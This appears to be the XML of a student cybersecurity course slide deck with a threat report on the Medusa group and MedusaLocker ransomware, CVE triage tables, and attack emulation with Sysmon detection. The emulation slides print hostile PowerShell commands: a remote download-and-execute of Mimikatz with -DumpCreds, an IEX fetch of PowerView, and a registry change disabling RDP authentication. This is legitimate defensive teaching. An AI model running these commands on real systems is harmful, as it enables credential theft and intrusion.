              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>PrintNightmare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t> allows remote code execution and privilege escalation, both critical vulnerabilities. Medusa uses related techniques, making it likely they would exploit this CVE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" b="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9A80F1-4708-C9AF-09E2-43DC15106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891186"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6096000" y="462838"/>
          <a:ext cx="565678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97">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="133248944"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1348668">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1098550358"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1479726">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="874697379"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1414197">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2158137703"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="667489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NZ" dirty="0"/>
                        <a:t>CWE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CAPEC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ATT&amp;CK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Used by Medusa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43711"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="593430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NZ" dirty="0"/>
                        <a:t>CWE-269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CAPEC-111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T1548.002: Abuse Elevation Control Mechanism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3916"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="593430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NZ" dirty="0"/>
                        <a:t>CWE-306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CAPEC-93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T1059.001: Command and Scripting Interpreter: PowerShell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66707"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="593430">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-NZ" dirty="0"/>
                        <a:t>CWE-287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CAPEC-272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T1078: Valid Accounts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337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C0BE-A9E0-8792-4DB6-129651DE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977F-F6C7-ECFD-EFE0-82B65666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8289-A672-DA88-9964-F68FC17D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EECF-1D10-F201-FCA4-F02824DA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000" dirty="0"/>
              <a:t>CVE-2020-1472 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Action: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t>Take Action</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Rationale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0"/>
              <a:t> can bypass authentication to gain admin access. Medusa’s usage of valid accounts techniques suggests they might exploit this CVE.</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" sz="2000" b="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F4BDD6-2E87-5AA2-C46E-6350FBDFD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12335"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6662738" y="969962"/>
          <a:ext cx="5021260" cy="373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15">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="958123000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1171000418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4050188203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3054347232"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="768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ATT&amp;CK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Used by Medusa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160122"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="768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CWE-287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CAPEC-272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T1078: Valid Accounts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568163"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1101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CWE-345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CAPEC-220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T1210: Exploitation of Remote Services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365187"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1101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CWE-362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CAPEC-212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T1562.001: Impair Defenses: Disable or Modify Tools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74774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5DCA-C6AC-5F72-35E5-2569850F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9D4A-8062-BBFC-4786-B4C7C0DF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E5E9-2449-4DF8-4B4A-2D9DD7A8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F3-78FE-D3C9-F1A6-BFF65CEC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253515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>CVE-2019-0708 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0"/>
              <a:t>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6302133-48AF-9536-43C9-E6E4D8456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80208"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6752011" y="978408"/>
          <a:ext cx="5021260" cy="435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15">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2799377939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3159866225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4236571679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2500009145"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="644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ATT&amp;CK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Used by Medusa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546514"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="923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CWE-787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T1210: Exploitation of Remote Services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551309"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1547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CWE-400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CAPEC-111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T1059.001: Command and Scripting Interpreter: PowerShell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082550"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1235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CWE-415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CAPEC-192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T1070.004: Indicator Removal on Host: File Deletion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57689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3696-70A0-6D71-622F-A6EF25D6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DEE5E-FA92-996D-BB7B-63619DA0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F3C6-1470-47DF-5973-6667B32A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A7CDC-F0E8-5F7F-E22F-08C7BF01B969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508650" y="192716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Action: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ignore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Rationale: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BlueKeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is serious, it primarily targets remote services, which Medusa does not exploit extensively. Only one relevant ATT&amp;CK code aligns with their methods.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50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" name="Picture 7" descr="A purple pawn and a rolling dice">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84E66158-6D64-19BD-D513-4A644849B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1" r="16246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34933-32DE-4846-4AF3-F4D1FDF4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9820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Task 4: Emulating an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D82CF-A321-8EA7-664D-3FD9B90BA635}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517871" y="2578608"/>
            <a:ext cx="4672966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Goals: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Search different types of attack techniques used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Ransomware.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Emulate a benign attack on Win22 virtual machine referencing attack codes from  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/redcanaryco/atomic-red-team</a:t>
            </a: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Use Sysmon Detection to detect the details of such attacks in the system.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ECAC-8E36-9D76-F762-264E725D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18/05/2024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73D6-3C1B-7A5E-9058-069B238E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E426-13EC-8C18-6A1C-27F5F57D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08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620-C6AC-3658-F1C7-8CC75C4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34716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ATT&amp;CK ID : T1021</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Remote Services [Remote Desktop Control]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The command to emulate a benign attack which tries to log into the computer using Remote Desktop Protocol (RDP) on PowerShell is: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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PS C:\Users\vagrant&gt; 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reg add "HKEY_LOCAL_MACHINE\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\Control\Terminal Server\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinStations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\RDP-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserAuthentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /d 0 /t REG_DWORD /f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(Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)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Sysmon Detection we use the following code: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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1021* | select -first 1 | Format-List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D3F-3750-8BAB-CC53-736CE98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60A-42BC-1F4E-F0B8-1C43C48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[COIT  11241] Peer Programming Task: Attack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FCC-56C2-9B17-882A-AA06FF4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mote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD673A10-552E-16C8-FD02-EF1E4B3D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219" y="657369"/>
            <a:ext cx="4528232" cy="552297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958A1-C1FB-27FA-0FAD-241E49C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9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Screenshots of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884A-183A-E73B-043D-B1AA280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571A-BC70-FB8C-A936-ED18392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AA35-2729-D2AD-E8E8-4DAE54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DD14526-DA32-A8BA-1C20-5B118C77A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831" y="2215881"/>
            <a:ext cx="5515396" cy="33772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A9BC7A-8A43-801D-F7C9-356D454FF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869" y="2215880"/>
            <a:ext cx="5515396" cy="337720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620-C6AC-3658-F1C7-8CC75C4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54420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ATT&amp;CK ID : T1059.001</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Execution [Command and Scripting Interpreter: Power</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Shell]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This attack abuses PowerShell commands and scripts for execution. The command to emulate a benign attack on PowerShell is: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PS C:\Users\vagrant&gt;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powershell.exe "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('#{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mimurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}'); Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DumpCreds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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(Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( Note: During execution device’s antivirus software blocked the PowerShell to run the command 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Sysmon Detection we use the following code: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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1059.001* | select -first 1 | Format-List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D3F-3750-8BAB-CC53-736CE98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60A-42BC-1F4E-F0B8-1C43C48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[COIT  11241] Peer Programming Task: Attack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FCC-56C2-9B17-882A-AA06FF4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mote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD673A10-552E-16C8-FD02-EF1E4B3D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991313" y="828275"/>
            <a:ext cx="4528232" cy="53816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958A1-C1FB-27FA-0FAD-241E49C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7" y="803904"/>
            <a:ext cx="7565779" cy="5013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Screenshots of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884A-183A-E73B-043D-B1AA280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571A-BC70-FB8C-A936-ED18392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AA35-2729-D2AD-E8E8-4DAE54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38043-E4E4-CBEE-2058-36B05BEA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608" y="1993558"/>
            <a:ext cx="5021184" cy="386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A941B8-8BDC-BE05-46EE-AF955E23F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4" y="1894703"/>
            <a:ext cx="5727700" cy="39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620-C6AC-3658-F1C7-8CC75C4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54420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ATT&amp;CK ID : T1018</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Tactic: Discovery [Remote System Discovery]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This command lists other IP addresses, hostname, etc. to get access remotely . The command to emulate a benign attack on PowerShell is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:b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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.ServicePointManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityProtocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.SecurityProtocolType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]::Tls12IEX (IWR 'https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/Recon/PowerView.ps1' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UseBasicParsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DomainController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -verbose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(Source :  https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md)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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( Note: During execution device’s antivirus software blocked this command from running due to malicious materials)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Sysmon Detection we use the following code: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Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *Sysmon* | where message -like *T1018* | select -first 1 | Format-List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D3F-3750-8BAB-CC53-736CE98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60A-42BC-1F4E-F0B8-1C43C48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[COIT  11241] Peer Programming Task: Attack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FCC-56C2-9B17-882A-AA06FF4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mote control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD673A10-552E-16C8-FD02-EF1E4B3D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991313" y="828275"/>
            <a:ext cx="4528232" cy="53816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958A1-C1FB-27FA-0FAD-241E49C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7" y="803904"/>
            <a:ext cx="7565779" cy="5013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Screenshots of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884A-183A-E73B-043D-B1AA280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571A-BC70-FB8C-A936-ED18392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AA35-2729-D2AD-E8E8-4DAE54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B7424-C8D7-7A7B-D118-C4F5392C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993558"/>
            <a:ext cx="5737543" cy="3992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76D82-C72A-87CE-0E3A-76A6096D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01" y="1993557"/>
            <a:ext cx="5021182" cy="39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30F-D042-4338-A98A-41FA7740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1A75-A408-4CC5-424B-AFCC777D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8DD3-216C-08C4-BE60-D132C0CF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A5D4-0EC5-6DC5-3026-398453A0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6E0F-74FF-BFB9-265A-ECF9FDB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C949-23C4-0DC8-59FD-D9B4BE32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558801"/>
            <a:ext cx="5021182" cy="1178560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Task 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> Ransomware and Medusa Threat Actor: An ATT&amp;CK Threat Intelligence Report</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-NZ" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-AU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A713650-23A8-44F3-1343-401DB4460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252557"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6187440" y="955041"/>
          <a:ext cx="5496560" cy="412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0F08-6BB6-1EF1-D7F0-E1E58E4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CDFA-8263-16CA-823F-FF505E3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B209-E7DB-B4F0-6B56-FE68255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12132-33D0-7DCE-3649-D575186F6F4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566168" y="185364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Content:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Graphic: A flowchart depicting the lifecycle stages of Medusa group and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> ransomware:</a:t>
            </a:r>
          </a:p>
          <a:p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Initial Access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>Spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> email with malicious attachment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Execution: PowerShell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Persistence: Registry run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Discovery: File and directory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Impact: Data encryption and ransom demand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>"Graphic based on the MITRE ATT&amp;CK framework [MITRE, 2024]"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24986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DF6F-C7F0-681E-68CA-9DB205B5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21868"/>
            <a:ext cx="5943890" cy="494791"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Threat Intelligence Report - Part 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ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E591-863B-107C-6C25-BD9DB738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508399"/>
            <a:ext cx="2204720" cy="182879"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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5B24-792A-A9AB-A3C0-D840E3F3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0EBA-DFBE-5FF4-F778-32A09120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D5694-B72B-7CD0-B769-65563BDEBAB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517870" y="1047454"/>
            <a:ext cx="468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Title: Medusa Threat Intelligence Report</a:t>
            </a:r>
            <a:endParaRPr lang="en-N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C26C4-0AA1-B378-2263-E92078ACDB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517870" y="1538815"/>
            <a:ext cx="5578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/>
              <a:t>Group Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Medusa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>Associated Groups: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>None documented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Medusa is a cyber threat group known for deploying the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>MedusaLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t> ransomware, which targets various sectors to extort ransom payments by encrypting critical data and demanding cryptocurrency payments for decryption.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0063C-4432-431F-CE60-D179D442B697}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517870" y="3564116"/>
            <a:ext cx="61442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/>
              <a:t>Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t>1. Phishing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0" err="1"/>
              <a:t>Spearphishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" b="1" dirty="0"/>
              <a:t> Attachment (T1566.001)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Medusa uses </a:t>
